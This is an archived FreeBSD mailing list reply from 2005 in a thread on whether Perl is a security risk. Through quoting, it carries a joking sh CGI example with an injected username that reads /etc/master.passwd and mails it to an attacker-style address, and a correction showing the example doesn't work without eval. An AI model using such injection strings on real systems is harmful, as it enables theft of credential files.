Skip site navigation (1)Skip section navigation (2)
Date:      Fri, 4 Feb 2005 22:19:18 -0800
From:      "Loren M. Lang" <lorenl@alzatex.com>
To:        Dan Nelson <dnelson@allantgroup.com>
Cc:        freebsd-questions@freebsd.org
Subject:   Re: perl and ports
Message-ID:  <20050205061918.GG8619@alzatex.com>
In-Reply-To: <20050205041344.GK25463@dan.emsphone.com>
References:  <200501251530.06424.shinjii@virusinfo.rdksupportinc.com> <20050125055301.GB16896@xor.obsecurity.org> <ef60af0905012500265eb38b66@mail.gmail.com> <EB3282A396FFCC78382D2E81@utd49554.utdallas.edu> <ef60af090501251100472d6fb6@mail.gmail.com> <20050125194736.GD76109@xor.obsecurity.org> <ef60af09050125142353301be4@mail.gmail.com> <ef60af09050125144166ecaae4@mail.gmail.com> <20050205034440.GF8619@alzatex.com> <20050205041344.GK25463@dan.emsphone.com>

next in thread | previous in thread | raw e-mail | index | archive | help
On Fri, Feb 04, 2005 at 10:13:45PM -0600, Dan Nelson wrote:
> In the last episode (Feb 04), Loren M. Lang said:
> > Actually, I think you should work on sh first, it's a much bigger
> > security hazard than perl.  If you've ever written much sh, you'd
> > realize with it's much loser syntax, it's easy to get into trouble. 
> > At least perl provides use strict and -Tw.  Someone using sh to write
> > cgi scripts is the worst.  Imagine someone writing the following like
> > for a sh cgi script where $USERNAME is a cgi paramater passed into
> > the following script:
> > 
> > echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"
> > 
> > What if someone wrote the following username and apache was running as
> > root:
> > 
> > charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo
> 
> Then you would get a web page containing:
> 
> <HTML><HEAD><TITLE>Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo</TITLE></HEAD>
> 
> .  The shell doesn't re-interpret its input unless explicitly told to
> via the "eval" command.  /bin/sh is a little limited for more complex
> scripts due to its lack of arrays, though, so zsh/ksh/bash are much
> better choices :)

Well, my email was meant as a joke and I didn't bother to validate anything
I wrote, I just remember reading something along these lines in a cgi book
warning of the dangers of sh scripting for cgi scripts.  The original
example was more elaborate and probably did use eval, but my point is
that sh can be more dangerous than perl since it uses a looser syntax.
By not using "'s around $USERNAME, it will end up being parsed as
multiple arguments which, for echo, isn't a big deal, but for most
commands you can end up shooting your self in the foot.  I definetly would
not recommend removing it from the system or even recommend against using
it for anything, but just pointing at the irony of considering perl a
giant security hole.

Mostly, I have just found this whole thread very humorous, and I wonder
what the reaction of the developers will be when he trys asking them to
stop using perl.

> 
> -- 
> 	Dan Nelson
> 	dnelson@allantgroup.com

-- 
I sense much NT in you.
NT leads to Bluescreen.
Bluescreen leads to downtime.
Downtime leads to suffering.
NT is the path to the darkside.
Powerful Unix is.

Public Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc
Fingerprint: B3B9 D669 69C9 09EC 1BCD  835A FAF3 7A46 E4A3 280C
 



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20050205061918.GG8619>